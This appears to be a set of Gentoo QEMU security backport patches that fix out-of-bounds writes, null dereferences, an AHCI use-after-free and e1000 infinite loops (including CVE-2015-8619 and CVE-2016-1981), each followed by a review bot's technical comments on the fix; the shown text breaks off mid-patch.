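Review bot: The length passed to `memset(&info, 0x0, dcmd_size);` in megasas_ctrl_get_info is still a separate variable rather than the size of the object being cleared. `dcmd_size` is defined outside the hunk and presumably equals `sizeof(info)`. Writing `memset(&info, 0x0, sizeof(info));` ties the bound to the destination so the two cannot drift apart again. The function continues past the hunk.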


@ -0,0 +1,121 @@
From 64ffbe04eaafebf4045a3ace52a360c14959d196 Mon Sep 17 00:00:00 2001
From: Wolfgang Bumiller <w.bumiller@proxmox.com>
Date: Wed, 13 Jan 2016 09:09:58 +0100
Subject: [PATCH] hmp: fix sendkey out of bounds write (CVE-2015-8619)
When processing 'sendkey' command, hmp_sendkey routine null
terminates the 'keyname_buf' array. This results in an OOB
write issue, if 'keyname_len' was to fall outside of
'keyname_buf' array.
Since the keyname's length is known the keyname_buf can be
removed altogether by adding a length parameter to
index_from_key() and using it for the error output as well.
Reported-by: Ling Liu <liuling-it@360.cn>
Signed-off-by: Wolfgang Bumiller <w.bumiller@proxmox.com>
Message-Id: <20160113080958.GA18934@olga>
[Comparison with "<" dumbed down, test for junk after strtoul()
tweaked]
Signed-off-by: Markus Armbruster <armbru@redhat.com>
---
hmp.c | 18 ++++++++----------
include/ui/console.h | 2 +-
ui/input-legacy.c | 5 +++--
3 files changed, 12 insertions(+), 13 deletions(-)
diff --git a/hmp.c b/hmp.c
index 54f2620..9c571f5 100644
--- a/hmp.c
+++ b/hmp.c
@@ -1731,21 +1731,18 @@ void hmp_sendkey(Monitor *mon, const QDict *qdict)
int has_hold_time = qdict_haskey(qdict, "hold-time");
int hold_time = qdict_get_try_int(qdict, "hold-time", -1);
Error *err = NULL;
- char keyname_buf[16];
char *separator;
int keyname_len;
while (1) {
separator = strchr(keys, '-');
keyname_len = separator ? separator - keys : strlen(keys);
- pstrcpy(keyname_buf, sizeof(keyname_buf), keys);
/* Be compatible with old interface, convert user inputted "<" */
- if (!strncmp(keyname_buf, "<", 1) && keyname_len == 1) {
- pstrcpy(keyname_buf, sizeof(keyname_buf), "less");
+ if (keys[0] == '<' && keyname_len == 1) {
+ keys = "less";
keyname_len = 4;
}
- keyname_buf[keyname_len] = 0;
keylist = g_malloc0(sizeof(*keylist));
keylist->value = g_malloc0(sizeof(*keylist->value));
@@ -1758,16 +1755,17 @@ void hmp_sendkey(Monitor *mon, const QDict *qdict)
}
tmp = keylist;
- if (strstart(keyname_buf, "0x", NULL)) {
+ if (strstart(keys, "0x", NULL)) {
char *endp;
- int value = strtoul(keyname_buf, &endp, 0);
- if (*endp != '\0') {
+ int value = strtoul(keys, &endp, 0);
+ assert(endp <= keys + keyname_len);
+ if (endp != keys + keyname_len) {
goto err_out;
}
keylist->value->type = KEY_VALUE_KIND_NUMBER;
keylist->value->u.number = value;
} else {
- int idx = index_from_key(keyname_buf);
+ int idx = index_from_key(keys, keyname_len);
if (idx == Q_KEY_CODE_MAX) {
goto err_out;
}
@@ -1789,7 +1787,7 @@ out:
return;
err_out:
- monitor_printf(mon, "invalid parameter: %s\n", keyname_buf);
+ monitor_printf(mon, "invalid parameter: %.*s\n", keyname_len, keys);
goto out;
}
diff --git a/include/ui/console.h b/include/ui/console.h
index adac36d..116bc2b 100644
--- a/include/ui/console.h
+++ b/include/ui/console.h
@@ -448,7 +448,7 @@ static inline int vnc_display_pw_expire(const char *id, time_t expires)
void curses_display_init(DisplayState *ds, int full_screen);
/* input.c */
-int index_from_key(const char *key);
+int index_from_key(const char *key, size_t key_length);
/* gtk.c */
void early_gtk_display_init(int opengl);
diff --git a/ui/input-legacy.c b/ui/input-legacy.c
index 35dfc27..3454055 100644
--- a/ui/input-legacy.c
+++ b/ui/input-legacy.c
@@ -57,12 +57,13 @@ struct QEMUPutLEDEntry {
static QTAILQ_HEAD(, QEMUPutLEDEntry) led_handlers =
QTAILQ_HEAD_INITIALIZER(led_handlers);
-int index_from_key(const char *key)
+int index_from_key(const char *key, size_t key_length)
{
int i;
for (i = 0; QKeyCode_lookup[i] != NULL; i++) {
- if (!strcmp(key, QKeyCode_lookup[i])) {
+ if (!strncmp(key, QKeyCode_lookup[i], key_length) &&
+ !QKeyCode_lookup[i][key_length]) {
break;
}
}
--
2.7.4
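Review bot: In hmp_sendkey the numeric branch still stores the result of `strtoul(keys, &endp, 0)` in an `int` with no range check, so an out-of-range key number is silently converted instead of rejected. I would parse with `errno = 0; unsigned long value = strtoul(keys, &endp, 0);` and take the existing error path with `if (errno == ERANGE || value > INT_MAX) goto err_out;` (the destination field's type is not visible here, so the upper bound is a guess). Separately, `keyname_len` is an `int` passed as the `size_t key_length` of index_from_key; it is non-negative as computed in the hunk, but a `size_t` local would make that explicit. hmp_sendkey's body extends beyond the hunks.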


@ -0,0 +1,49 @@
https://bugs.gentoo.org/570110
From 007cd223de527b5f41278f2d886c1a4beb3e67aa Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Mon, 28 Dec 2015 16:24:08 +0530
Subject: [PATCH] net: rocker: fix an incorrect array bounds check
While processing transmit(tx) descriptors in 'tx_consume' routine
the switch emulator suffers from an off-by-one error, if a
descriptor was to have more than allowed(ROCKER_TX_FRAGS_MAX=16)
fragments. Fix an incorrect bounds check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Cc: qemu-stable@nongnu.org
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/rocker/rocker.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/hw/net/rocker/rocker.c b/hw/net/rocker/rocker.c
index c57f1a6..2e77e50 100644
--- a/hw/net/rocker/rocker.c
+++ b/hw/net/rocker/rocker.c
@@ -232,6 +232,9 @@ static int tx_consume(Rocker *r, DescInfo *info)
frag_addr = rocker_tlv_get_le64(tlvs[ROCKER_TLV_TX_FRAG_ATTR_ADDR]);
frag_len = rocker_tlv_get_le16(tlvs[ROCKER_TLV_TX_FRAG_ATTR_LEN]);
+ if (iovcnt >= ROCKER_TX_FRAGS_MAX) {
+ goto err_too_many_frags;
+ }
iov[iovcnt].iov_len = frag_len;
iov[iovcnt].iov_base = g_malloc(frag_len);
if (!iov[iovcnt].iov_base) {
@@ -244,10 +247,7 @@ static int tx_consume(Rocker *r, DescInfo *info)
err = -ROCKER_ENXIO;
goto err_bad_io;
}
-
- if (++iovcnt > ROCKER_TX_FRAGS_MAX) {
- goto err_too_many_frags;
- }
+ iovcnt++;
}
if (iovcnt) {
--
2.6.2
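Review bot: The relocated `goto err_too_many_frags` in tx_consume is taken without assigning `err`, unlike the neighbouring `err = -ROCKER_ENXIO; goto err_bad_io;` path. A descriptor with more than ROCKER_TX_FRAGS_MAX fragments may therefore complete with whatever `err` held before the loop, possibly success; its initialisation is outside the hunk. If so, set a code before the jump, for example `err = -ROCKER_EINVAL;`. The body of tx_consume starts and ends outside the hunks shown.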


@ -0,0 +1,50 @@
https://bugs.gentoo.org/570988
From aa7f9966dfdff500bbbf1956d9e115b1fa8987a6 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 31 Dec 2015 17:05:27 +0530
Subject: [PATCH] net: ne2000: fix bounds check in ioport operations
While doing ioport r/w operations, ne2000 device emulation suffers
from OOB r/w errors. Update respective array bounds check to avoid
OOB access.
Reported-by: Ling Liu <liuling-it@360.cn>
Cc: qemu-stable@nongnu.org
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/ne2000.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/net/ne2000.c b/hw/net/ne2000.c
index 010f9ef..a3dffff 100644
--- a/hw/net/ne2000.c
+++ b/hw/net/ne2000.c
@@ -467,8 +467,9 @@ static inline void ne2000_mem_writel(NE2000State *s, uint32_t addr,
uint32_t val)
{
addr &= ~1; /* XXX: check exact behaviour if not even */
- if (addr < 32 ||
- (addr >= NE2000_PMEM_START && addr < NE2000_MEM_SIZE)) {
+ if (addr < 32
+ || (addr >= NE2000_PMEM_START
+ && addr + sizeof(uint32_t) <= NE2000_MEM_SIZE)) {
stl_le_p(s->mem + addr, val);
}
}
@@ -497,8 +498,9 @@ static inline uint32_t ne2000_mem_readw(NE2000State *s, uint32_t addr)
static inline uint32_t ne2000_mem_readl(NE2000State *s, uint32_t addr)
{
addr &= ~1; /* XXX: check exact behaviour if not even */
- if (addr < 32 ||
- (addr >= NE2000_PMEM_START && addr < NE2000_MEM_SIZE)) {
+ if (addr < 32
+ || (addr >= NE2000_PMEM_START
+ && addr + sizeof(uint32_t) <= NE2000_MEM_SIZE)) {
return ldl_le_p(s->mem + addr);
} else {
return 0xffffffff;
--
2.6.2
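Review bot: The new bound `addr + sizeof(uint32_t) <= NE2000_MEM_SIZE` in ne2000_mem_writel is an addition that can wrap where `size_t` is 32 bits wide. An `addr` within four of UINT32_MAX then sums to a small value and passes the check. Whether any caller can pass such an address is not visible in these hunks, but the subtraction form cannot wrap: `&& addr <= NE2000_MEM_SIZE - sizeof(uint32_t)`. ne2000_mem_readl carries the identical line and needs the same change.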


@ -0,0 +1,41 @@
https://bugs.gentoo.org/571566
From 4ab0359a8ae182a7ac5c99609667273167703fab Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Mon, 11 Jan 2016 14:10:42 -0500
Subject: [PATCH] ide: ahci: reset ncq object to unused on error
When processing NCQ commands, AHCI device emulation prepares a
NCQ transfer object; To which an aio control block(aiocb) object
is assigned in 'execute_ncq_command'. In case, when the NCQ
command is invalid, the 'aiocb' object is not assigned, and NCQ
transfer object is left as 'used'. This leads to a use after
free kind of error in 'bdrv_aio_cancel_async' via 'ahci_reset_port'.
Reset NCQ transfer object to 'unused' to avoid it.
[Maintainer edit: s/ACHI/AHCI/ in the commit message. --js]
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Reviewed-by: John Snow <jsnow@redhat.com>
Message-id: 1452282511-4116-1-git-send-email-ppandit@redhat.com
Signed-off-by: John Snow <jsnow@redhat.com>
---
hw/ide/ahci.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/ide/ahci.c b/hw/ide/ahci.c
index dd1912e..17f1cbd 100644
--- a/hw/ide/ahci.c
+++ b/hw/ide/ahci.c
@@ -910,6 +910,7 @@ static void ncq_err(NCQTransferState *ncq_tfs)
ide_state->error = ABRT_ERR;
ide_state->status = READY_STAT | ERR_STAT;
ncq_tfs->drive->port_regs.scr_err |= (1 << ncq_tfs->tag);
+ ncq_tfs->used = 0;
}
static void ncq_finish(NCQTransferState *ncq_tfs)
--
2.6.2
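Review bot: The added `ncq_tfs->used = 0;` in ncq_err has no comment, so the reason for it lives only in the commit message: a slot left marked used with no aiocb assigned is later handed to the cancel path on port reset. A comment beside the assignment would keep that invariant with the code: `/* no aiocb was assigned on this path; free the slot so a port reset does not try to cancel one */`.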


@ -0,0 +1,58 @@
From 66f8fd9dda312191b78d2a2ba2848bcee76127a2 Mon Sep 17 00:00:00 2001
From: "Gabriel L. Somlo" <somlo@cmu.edu>
Date: Thu, 5 Nov 2015 09:32:50 -0500
Subject: [PATCH] fw_cfg: avoid calculating invalid current entry pointer
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
When calculating a pointer to the currently selected fw_cfg item, the
following is used:
FWCfgEntry *e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
When s->cur_entry is FW_CFG_INVALID, we are calculating the address of
a non-existent element in s->entries[arch][...], which is undefined.
This patch ensures the resulting entry pointer is set to NULL whenever
s->cur_entry is FW_CFG_INVALID.
Reported-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Laszlo Ersek <lersek@redhat.com>
Signed-off-by: Gabriel Somlo <somlo@cmu.edu>
Message-id: 1446733972-1602-5-git-send-email-somlo@cmu.edu
Cc: Marc Marí <markmb@redhat.com>
Signed-off-by: Gabriel Somlo <somlo@cmu.edu>
Reviewed-by: Laszlo Ersek <lersek@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/nvram/fw_cfg.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/hw/nvram/fw_cfg.c b/hw/nvram/fw_cfg.c
index c2d3a0a..046fa74 100644
--- a/hw/nvram/fw_cfg.c
+++ b/hw/nvram/fw_cfg.c
@@ -277,7 +277,8 @@ static int fw_cfg_select(FWCfgState *s, uint16_t key)
static uint8_t fw_cfg_read(FWCfgState *s)
{
int arch = !!(s->cur_entry & FW_CFG_ARCH_LOCAL);
- FWCfgEntry *e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
+ FWCfgEntry *e = (s->cur_entry == FW_CFG_INVALID) ? NULL :
+ &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
uint8_t ret;
if (s->cur_entry == FW_CFG_INVALID || !e->data || s->cur_offset >= e->len)
@@ -342,7 +343,8 @@ static void fw_cfg_dma_transfer(FWCfgState *s)
}
arch = !!(s->cur_entry & FW_CFG_ARCH_LOCAL);
- e = &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
+ e = (s->cur_entry == FW_CFG_INVALID) ? NULL :
+ &s->entries[arch][s->cur_entry & FW_CFG_ENTRY_MASK];
if (dma.control & FW_CFG_DMA_CTL_READ) {
read = 1;
--
2.7.4
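Review bot: In the fw_cfg_dma_transfer hunk `e` can now be NULL, and every later dereference of it lies outside the hunk. It cannot be confirmed from here that each one tests `s->cur_entry == FW_CFG_INVALID` first, as fw_cfg_read does in the `if` right after its own assignment. A comment at the assignment would flag the new contract: `/* e is NULL for FW_CFG_INVALID; check cur_entry before every e-> access */`. The same ternary is written out twice, so a small static helper returning the current entry or NULL would keep the two sites from drifting apart.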


@ -0,0 +1,65 @@
From 4c1396cb576c9b14425558b73de1584c7a9735d7 Mon Sep 17 00:00:00 2001
From: P J P <ppandit@redhat.com>
Date: Fri, 18 Dec 2015 11:35:07 +0530
Subject: [PATCH] i386: avoid null pointer dereference
Hello,
A null pointer dereference issue was reported by Mr Ling Liu, CC'd here. It
occurs while doing I/O port write operations via hmp interface. In that,
'current_cpu' remains null as it is not called from cpu_exec loop, which
results in the said issue.
Below is a proposed (tested)patch to fix this issue; Does it look okay?
===
From ae88a4947fab9a148cd794f8ad2d812e7f5a1d0f Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 18 Dec 2015 11:16:07 +0530
Subject: [PATCH] i386: avoid null pointer dereference
When I/O port write operation is called from hmp interface,
'current_cpu' remains null, as it is not called from cpu_exec()
loop. This leads to a null pointer dereference in vapic_write
routine. Add check to avoid it.
Reported-by: Ling Liu <liuling-it@360.cn>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-Id: <alpine.LFD.2.20.1512181129320.9805@wniryva>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: P J P <ppandit@redhat.com>
---
hw/i386/kvmvapic.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/hw/i386/kvmvapic.c b/hw/i386/kvmvapic.c
index c6d34b2..f0922da 100644
--- a/hw/i386/kvmvapic.c
+++ b/hw/i386/kvmvapic.c
@@ -634,13 +634,18 @@ static int vapic_prepare(VAPICROMState *s)
static void vapic_write(void *opaque, hwaddr addr, uint64_t data,
unsigned int size)
{
- CPUState *cs = current_cpu;
- X86CPU *cpu = X86_CPU(cs);
- CPUX86State *env = &cpu->env;
- hwaddr rom_paddr;
VAPICROMState *s = opaque;
+ X86CPU *cpu;
+ CPUX86State *env;
+ hwaddr rom_paddr;
- cpu_synchronize_state(cs);
+ if (!current_cpu) {
+ return;
+ }
+
+ cpu_synchronize_state(current_cpu);
+ cpu = X86_CPU(current_cpu);
+ env = &cpu->env;
/*
* The VAPIC supports two PIO-based hypercalls, both via port 0x7E.
--
2.7.4
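Review bot: The early `return` for a NULL `current_cpu` in vapic_write drops the port write silently and without a comment. The explanation, that the write can arrive from the monitor rather than from the cpu_exec() loop, is only in the commit message. I would put it on the guard: `/* current_cpu is NULL when the write does not come from a vCPU (e.g. the monitor); ignore it */`. The rest of vapic_write is outside the hunk.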


@ -0,0 +1,98 @@
From dd793a74882477ca38d49e191110c17dfee51dcc Mon Sep 17 00:00:00 2001
From: Laszlo Ersek <lersek@redhat.com>
Date: Tue, 19 Jan 2016 14:17:20 +0100
Subject: [PATCH] e1000: eliminate infinite loops on out-of-bounds transfer
start
The start_xmit() and e1000_receive_iov() functions implement DMA transfers
iterating over a set of descriptors that the guest's e1000 driver
prepares:
- the TDLEN and RDLEN registers store the total size of the descriptor
area,
- while the TDH and RDH registers store the offset (in whole tx / rx
descriptors) into the area where the transfer is supposed to start.
Each time a descriptor is processed, the TDH and RDH register is bumped
(as appropriate for the transfer direction).
QEMU already contains logic to deal with bogus transfers submitted by the
guest:
- Normally, the transmit case wants to increase TDH from its initial value
to TDT. (TDT is allowed to be numerically smaller than the initial TDH
value; wrapping at or above TDLEN bytes to zero is normal.) The failsafe
that QEMU currently has here is a check against reaching the original
TDH value again -- a complete wraparound, which should never happen.
- In the receive case RDH is increased from its initial value until
"total_size" bytes have been received; preferably in a single step, or
in "s->rxbuf_size" byte steps, if the latter is smaller. However, null
RX descriptors are skipped without receiving data, while RDH is
incremented just the same. QEMU tries to prevent an infinite loop
(processing only null RX descriptors) by detecting whether RDH assumes
its original value during the loop. (Again, wrapping from RDLEN to 0 is
normal.)
What both directions miss is that the guest could program TDLEN and RDLEN
so low, and the initial TDH and RDH so high, that these registers will
immediately be truncated to zero, and then never reassume their initial
values in the loop -- a full wraparound will never occur.
The condition that expresses this is:
xdh_start >= s->mac_reg[XDLEN] / sizeof(desc)
i.e., TDH or RDH start out after the last whole rx or tx descriptor that
fits into the TDLEN or RDLEN sized area.
This condition could be checked before we enter the loops, but
pci_dma_read() / pci_dma_write() knows how to fill in buffers safely for
bogus DMA addresses, so we just extend the existing failsafes with the
above condition.
This is CVE-2016-1981.
Cc: "Michael S. Tsirkin" <mst@redhat.com>
Cc: Petr Matousek <pmatouse@redhat.com>
Cc: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
Cc: Prasad Pandit <ppandit@redhat.com>
Cc: Michael Roth <mdroth@linux.vnet.ibm.com>
Cc: Jason Wang <jasowang@redhat.com>
Cc: qemu-stable@nongnu.org
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1296044
Signed-off-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Jason Wang <jasowang@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/e1000.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/hw/net/e1000.c b/hw/net/e1000.c
index 4eda7a3..0387fa0 100644
--- a/hw/net/e1000.c
+++ b/hw/net/e1000.c
@@ -909,7 +909,8 @@ start_xmit(E1000State *s)
* bogus values to TDT/TDLEN.
* there's nothing too intelligent we could do about this.
*/
- if (s->mac_reg[TDH] == tdh_start) {
+ if (s->mac_reg[TDH] == tdh_start ||
+ tdh_start >= s->mac_reg[TDLEN] / sizeof(desc)) {
DBGOUT(TXERR, "TDH wraparound @%x, TDT %x, TDLEN %x\n",
tdh_start, s->mac_reg[TDT], s->mac_reg[TDLEN]);
break;
@@ -1166,7 +1167,8 @@ e1000_receive_iov(NetClientState *nc, const struct iovec *iov, int iovcnt)
if (++s->mac_reg[RDH] * sizeof(desc) >= s->mac_reg[RDLEN])
s->mac_reg[RDH] = 0;
/* see comment in start_xmit; same here */
- if (s->mac_reg[RDH] == rdh_start) {
+ if (s->mac_reg[RDH] == rdh_start ||
+ rdh_start >= s->mac_reg[RDLEN] / sizeof(desc)) {
DBGOUT(RXERR, "RDH wraparound @%x, RDT %x, RDLEN %x\n",
rdh_start, s->mac_reg[RDT], s->mac_reg[RDLEN]);
set_ics(s, 0, E1000_ICS_RXO);
--
2.7.4
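Review bot: The new clause `tdh_start >= s->mac_reg[TDLEN] / sizeof(desc)` in start_xmit reuses the existing `"TDH wraparound ..."` debug message, so a start index beyond the descriptor area is logged as a wraparound that did not occur. The e1000_receive_iov hunk does the same with `"RDH wraparound ..."`. Anyone reading these traces to work out what a guest programmed would be misled. A comment such as `/* also taken when TDH started past the last whole descriptor in TDLEN */`, or a separate message for the second condition, would make the two cases distinguishable. Both loops continue outside the hunks.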


@ -0,0 +1,43 @@
From 99b4cb71069f109b79b27bc629fc0cf0886dbc4b Mon Sep 17 00:00:00 2001
From: John Snow <jsnow@redhat.com>
Date: Wed, 10 Feb 2016 13:29:40 -0500
Subject: [PATCH] ahci: Do not unmap NULL addresses
Definitely don't try to unmap a garbage address.
Reported-by: Zuozhi fzz <zuozhi.fzz@alibaba-inc.com>
Signed-off-by: John Snow <jsnow@redhat.com>
Message-id: 1454103689-13042-2-git-send-email-jsnow@redhat.com
---
hw/ide/ahci.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/hw/ide/ahci.c b/hw/ide/ahci.c
index 7e87b18..3a95dad 100644
--- a/hw/ide/ahci.c
+++ b/hw/ide/ahci.c
@@ -662,6 +662,10 @@ static bool ahci_map_fis_address(AHCIDevice *ad)
static void ahci_unmap_fis_address(AHCIDevice *ad)
{
+ if (ad->res_fis == NULL) {
+ DPRINTF(ad->port_no, "Attempt to unmap NULL FIS address\n");
+ return;
+ }
dma_memory_unmap(ad->hba->as, ad->res_fis, 256,
DMA_DIRECTION_FROM_DEVICE, 256);
ad->res_fis = NULL;
@@ -678,6 +682,10 @@ static bool ahci_map_clb_address(AHCIDevice *ad)
static void ahci_unmap_clb_address(AHCIDevice *ad)
{
+ if (ad->lst == NULL) {
+ DPRINTF(ad->port_no, "Attempt to unmap NULL CLB address\n");
+ return;
+ }
dma_memory_unmap(ad->hba->as, ad->lst, 1024,
DMA_DIRECTION_FROM_DEVICE, 1024);
ad->lst = NULL;
--
2.7.4
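Review bot: The guards added to ahci_unmap_fis_address and ahci_unmap_clb_address test only for NULL, so they help only if `ad->res_fis` and `ad->lst` are NULL whenever nothing is mapped. The hunks show that for the path after an unmap (`ad->res_fis = NULL;`, `ad->lst = NULL;`). The map functions and their failure paths are outside them, and the commit message speaks of a garbage address rather than a NULL one. Stating the invariant at the guard would make it checkable: `/* res_fis is NULL whenever no FIS area is mapped */`, and likewise for `lst`.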


@ -0,0 +1,46 @@
From dff0367cf66f489aa772320fa2937a8cac1ca30d Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Fri, 29 Jan 2016 18:30:34 +0530
Subject: [PATCH] usb: ehci: add capability mmio write function
USB Ehci emulation supports host controller capability registers.
But its mmio '.write' function was missing, which lead to a null
pointer dereference issue. Add a do nothing 'ehci_caps_write'
definition to avoid it; Do nothing because capability registers
are Read Only(RO).
Reported-by: Zuozhi Fzz <zuozhi.fzz@alibaba-inc.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1454072434-16045-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/hcd-ehci.c | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
index 1b50601..0f95d0d 100644
--- a/hw/usb/hcd-ehci.c
+++ b/hw/usb/hcd-ehci.c
@@ -895,6 +895,11 @@ static uint64_t ehci_caps_read(void *ptr, hwaddr addr,
return s->caps[addr];
}
+static void ehci_caps_write(void *ptr, hwaddr addr,
+ uint64_t val, unsigned size)
+{
+}
+
static uint64_t ehci_opreg_read(void *ptr, hwaddr addr,
unsigned size)
{
@@ -2315,6 +2320,7 @@ static void ehci_frame_timer(void *opaque)
static const MemoryRegionOps ehci_mmio_caps_ops = {
.read = ehci_caps_read,
+ .write = ehci_caps_write,
.valid.min_access_size = 1,
.valid.max_access_size = 4,
.impl.min_access_size = 1,
--
2.7.4
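Review bot: `ehci_caps_write` is added with an empty body and no comment, so it looks like an unfinished stub to anyone who has not read the commit message. The reason belongs in the function: `/* capability registers are read-only: guest writes are ignored */`. That also documents that all four parameters are unused on purpose.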


@ -0,0 +1,35 @@
From 80eecda8e5d09c442c24307f340840a5b70ea3b9 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 11 Feb 2016 16:31:20 +0530
Subject: [PATCH] usb: check USB configuration descriptor object
When processing remote NDIS control message packets, the USB Net
device emulator checks to see if the USB configuration descriptor
object is of RNDIS type(2). But it does not check if it is null,
which leads to a null dereference error. Add check to avoid it.
Reported-by: Qinghao Tang <luodalongde@gmail.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Message-id: 1455188480-14688-1-git-send-email-ppandit@redhat.com
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
hw/usb/dev-network.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/usb/dev-network.c b/hw/usb/dev-network.c
index 985a629..5dc4538 100644
--- a/hw/usb/dev-network.c
+++ b/hw/usb/dev-network.c
@@ -654,7 +654,8 @@ typedef struct USBNetState {
static int is_rndis(USBNetState *s)
{
- return s->dev.config->bConfigurationValue == DEV_RNDIS_CONFIG_VALUE;
+ return s->dev.config ?
+ s->dev.config->bConfigurationValue == DEV_RNDIS_CONFIG_VALUE : 0;
}
static int ndis_query(USBNetState *s, uint32_t oid,
--
2.7.4
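Review bot: The ternary in is_rndis, with a literal `0` as its false arm, is harder to read than a short-circuit form that yields the same int: `return s->dev.config && s->dev.config->bConfigurationValue == DEV_RNDIS_CONFIG_VALUE;`. Any other dereference of `s->dev.config` in this file is outside the hunk and is not covered by this check.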


@ -1,11 +1,13 @@
--- a/configure --- a/configure
+++ b/configure +++ b/configure
@@ -3131,8 +3131,6 @@ fi @@ -4468,10 +4468,6 @@ fi
if test "$gcov" = "yes" ; then if test "$gcov" = "yes" ; then
CFLAGS="-fprofile-arcs -ftest-coverage -g $CFLAGS" CFLAGS="-fprofile-arcs -ftest-coverage -g $CFLAGS"
LDFLAGS="-fprofile-arcs -ftest-coverage $LDFLAGS" LDFLAGS="-fprofile-arcs -ftest-coverage $LDFLAGS"
-elif test "$debug" = "no" ; then -elif test "$fortify_source" = "yes" ; then
- CFLAGS="-O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 $CFLAGS" - CFLAGS="-O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 $CFLAGS"
-elif test "$debug" = "no"; then
- CFLAGS="-O2 $CFLAGS"
fi fi
##########################################
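Review bot: The refreshed patch removes both the `fortify_source` branch and the `debug = no` branch from configure, so neither `-D_FORTIFY_SOURCE=2` nor `-O2` is set by the build itself any more. Both must now come from the CFLAGS handed in by the ebuild or toolchain, which this section does not show. Unlike most other patches in this commit, the file has no header line saying why. A first line such as `Leave optimisation and _FORTIFY_SOURCE to the CFLAGS supplied by the package manager` would record that the loss of the built-in hardening flag is intended.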


@ -0,0 +1,37 @@
From 415ab35a441eca767d033a2702223e785b9d5190 Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Wed, 24 Feb 2016 11:41:33 +0530
Subject: [PATCH] net: ne2000: check ring buffer control registers
Ne2000 NIC uses ring buffer of NE2000_MEM_SIZE(49152)
bytes to process network packets. Registers PSTART & PSTOP
define ring buffer size & location. Setting these registers
to invalid values could lead to infinite loop or OOB r/w
access issues. Add check to avoid it.
Reported-by: Yang Hongke <yanghongke@huawei.com>
Tested-by: Yang Hongke <yanghongke@huawei.com>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/ne2000.c | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/hw/net/ne2000.c b/hw/net/ne2000.c
index e408083..f0feaf9 100644
--- a/hw/net/ne2000.c
+++ b/hw/net/ne2000.c
@@ -155,6 +155,10 @@ static int ne2000_buffer_full(NE2000State *s)
{
int avail, index, boundary;
+ if (s->stop <= s->start) {
+ return 1;
+ }
+
index = s->curpag << 8;
boundary = s->boundary << 8;
if (index < boundary)
--
2.7.4
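Review bot: The guard added to ne2000_buffer_full rejects only `s->stop <= s->start` and compares neither register with NE2000_MEM_SIZE, although the commit message also names out-of-bounds access as a consequence of bad PSTART/PSTOP values. Whether the registers are bounded where they are written is not visible in this hunk. If they are not, the guard could cover that case as well: `if (s->stop <= s->start || s->stop > NE2000_MEM_SIZE) {`. The function body continues past the hunk.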


@ -0,0 +1,98 @@
From 3c52ddcdc548e7fbe65112d8a7bdc9cd105b4750 Mon Sep 17 00:00:00 2001
From: Ladi Prosek <lprosek@redhat.com>
Date: Thu, 3 Mar 2016 09:37:15 +0100
Subject: [PATCH] rng: remove the unused request cancellation code
rng_backend_cancel_requests had no callers and none of the code
deleted in this commit ever ran.
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Message-Id: <1456994238-9585-2-git-send-email-lprosek@redhat.com>
Signed-off-by: Amit Shah <amit.shah@redhat.com>
---
backends/rng-egd.c | 12 ------------
backends/rng.c | 9 ---------
include/sysemu/rng.h | 11 -----------
3 files changed, 32 deletions(-)
diff --git a/backends/rng-egd.c b/backends/rng-egd.c
index 2de5cd5..0b2976a 100644
--- a/backends/rng-egd.c
+++ b/backends/rng-egd.c
@@ -125,17 +125,6 @@ static void rng_egd_free_requests(RngEgd *s)
s->requests = NULL;
}
-static void rng_egd_cancel_requests(RngBackend *b)
-{
